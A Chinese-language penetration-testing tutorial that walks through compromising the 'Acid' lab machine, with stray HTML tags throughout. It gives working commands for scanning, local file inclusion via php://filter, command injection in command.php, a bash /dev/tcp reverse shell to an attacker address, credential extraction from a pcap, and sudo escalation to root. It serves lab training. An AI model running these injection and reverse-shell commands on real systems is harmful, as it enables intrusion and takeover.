Acid 靶机渗透测试教学文档<\/h1>

1. 信息收集<\/h2>

1.1 端口扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- 192.168.101.157 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

33447\/tcp: Apache httpd 2.4.10 (Ubuntu)<\/li>
<\/ul>
1.2 目录枚举<\/h3>
使用Gobuster进行目录扫描：<\/p>
gobuster dir -u "http:\/\/192.168.101.157:33447"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -x .php
<\/span><\/span><\/code><\/pre>发现重要目录：<\/p>

\/Challenge\/<\/li>
<\/ul>
2. 初始访问<\/h2>
2.1 发现acid.txt文件<\/h3>
访问：<\/p>
http:\/\/192.168.101.157:33447\/Challenge\/acid.txt
<\/code><\/pre>
文件内容经过ROT13编码和反转：<\/p>
echo "gkg.qvpn"<\/span> | tr 'A-Za-z'<\/span> 'N-ZA-Mn-za-m'<\/span>|rev
<\/span><\/span><\/code><\/pre>解码后得到：<\/p>

Username: test_user<\/li>
Email: test@example.com<\/li>
Password: 6ZaxN2Vzm9NUJT2y<\/li>
<\/ul>
3. 本地文件包含(LFI)漏洞利用<\/h2>
3.1 利用include.php读取\/etc\/passwd<\/h3>
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3"<\/span> "http:\/\/192.168.101.157:33447\/Challenge\/include.php?add=Extract+File&file=\/etc\/passwd"<\/span> | sed '\/<!DOCTYPE html>\/,$d'<\/span>
<\/span><\/span><\/code><\/pre>返回内容为十六进制编码：<\/p>
0x5933566a4c6e4a34626e413d
<\/code><\/pre>
解码过程：<\/p>
echo "5933566a4c6e4a34626e413d"<\/span> | xxd -r -p |base64 -d | tr 'A-Za-z'<\/span> 'N-ZA-Mn-za-m'<\/span>|rev
<\/span><\/span><\/code><\/pre>3.2 读取PHP源代码<\/h3>
使用php:\/\/filter读取cake.php源代码：<\/p>
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3"<\/span> "http:\/\/192.168.101.157:33447\/Challenge\/include.php?add=Extract+File&file=php:\/\/filter\/convert.base64-encode\/resource=cake.php"<\/span>
<\/span><\/span><\/code><\/pre>解码：<\/p>
echo 'PD9waHAKaW5jbHVkZV9vbmNlICdpbmNsdWRlcy9kYl9jb25uZWN0LnBocCc7CmluY2x1ZGVfb25jZSAnaW5jbHVkZXMvZnVuY3Rpb25zLnBocCc7Cj8+CgoKCjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICAgIDxoZWFkPgogICAgICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KICAgICAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9zdHlsZS5jc3MiPgogICAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGVzL21haW4uY3NzIiAvPgogICAgICAgIDx0aXRsZT4vTWFnaWNfQm94PC90aXRsZT4KICAgIDwvaGVhZD4KICAgIDxib2R5PgogICAgICAgICA8ZGl2IGNsYXNzPSJ3cmFwcGVyIj4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxoMT48Zm9udCBjb2xvcj0nUmVkJz5BaC5oYWFuLi4uLlRoZXJlIGlzIGxvbmcgd2F5IHRvIGdvLi5kdWRlIDotKTwvaDE+PC9mb250Pjxicj48Zm9udCBjb2xvcj0nR3JlZW4nPlBsZWFzZSA8YSBocmVmPSJpbmRleC5waHAiPmxvZ2luPC9hPjwvZiQKICAgIDwvYm9keT4KPC9odG1sPgo8P3BocAoKLyogQ29tZSBvbi4uLi5jYXRjaCB0aGlzIGZpbGUgInRhaWxzLnBocCIgKi8KPz4K'<\/span>|base64 -d
<\/span><\/span><\/code><\/pre>4. 远程代码执行(RCE)漏洞利用<\/h2>
4.1 发现Magic_Box\/tails.php<\/h3>
curl http:\/\/192.168.101.157:33447\/Challenge\/Magic_Box\/tails.php
<\/span><\/span><\/code><\/pre>4.2 读取validate.php获取密钥<\/h3>
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3"<\/span> "http:\/\/192.168.101.157:33447\/Challenge\/include.php?add=Extract+File&file=php:\/\/filter\/convert.base64-encode\/resource=.\/Magic_Box\/proc\/validate.php"<\/span>
<\/span><\/span><\/code><\/pre>解码后发现密钥：<\/p>
key:63425
<\/code><\/pre>
4.3 利用command.php执行命令<\/h3>
curl -X POST -d "IP=;ls&submit=submit"<\/span> http:\/\/192.168.101.157:33447\/Challenge\/Magic_Box\/command.php
<\/span><\/span><\/code><\/pre>4.4 获取反向shell<\/h3>
curl -X POST -d "IP=;\/bin\/bash -c 'bash%20%3E%26%2Fdev%2Ftcp%2F192.168.101.128%2F10032%200%3E%261'"<\/span>+"&submit=submit"<\/span> http:\/\/192.168.101.157:33447\/Challenge\/Magic_Box\/command.php
<\/span><\/span><\/code><\/pre>5. 权限提升<\/h2>
5.1 查找pcapng文件<\/h3>
find \/ -type f -name *.pcap* 2>\/tmp\/null
<\/span><\/span><\/code><\/pre>发现文件：<\/p>
\/sbin\/raw_vs_isi\/hint.pcapng
<\/code><\/pre>
5.2 传输文件到本地<\/h3>
cp \/sbin\/raw_vs_isi\/hint.pcapng \/tmp
<\/span><\/span>python3 -m http.server 9999<\/span>
<\/span><\/span><\/code><\/pre>本地下载：<\/p>
wget http:\/\/192.168.101.157:9999\/hint.pcapng
<\/span><\/span><\/code><\/pre>5.3 分析pcapng文件<\/h3>
tshark -r hint.pcapng -qz follow,tcp,ascii,0
<\/span><\/span><\/code><\/pre>发现凭据：<\/p>

username: saman<\/li>
password: 1337hax0r<\/li>
<\/ul>
5.4 提权到root<\/h3>
su saman
<\/span><\/span>sudo \/bin\/bash
<\/span><\/span><\/code><\/pre>5.5 获取flag<\/h3>
cat \/root\/flag.txt
<\/span><\/span><\/code><\/pre>flag内容：<\/p>
Acid@Makke@Hax0r
<\/code><\/pre>
6. 关键知识点总结<\/h2>

信息收集<\/strong>：Nmap扫描、目录枚举<\/li>
编码分析<\/strong>：ROT13、十六进制、base64编码<\/li>
LFI漏洞利用<\/strong>：读取\/etc\/passwd、PHP文件源码<\/li>
RCE漏洞利用<\/strong>：命令注入、反向shell<\/li>
权限提升<\/strong>：分析网络流量文件获取凭据、sudo提权<\/li>
工具使用<\/strong>：curl、tshark、python HTTP服务器<\/li>
<\/ol>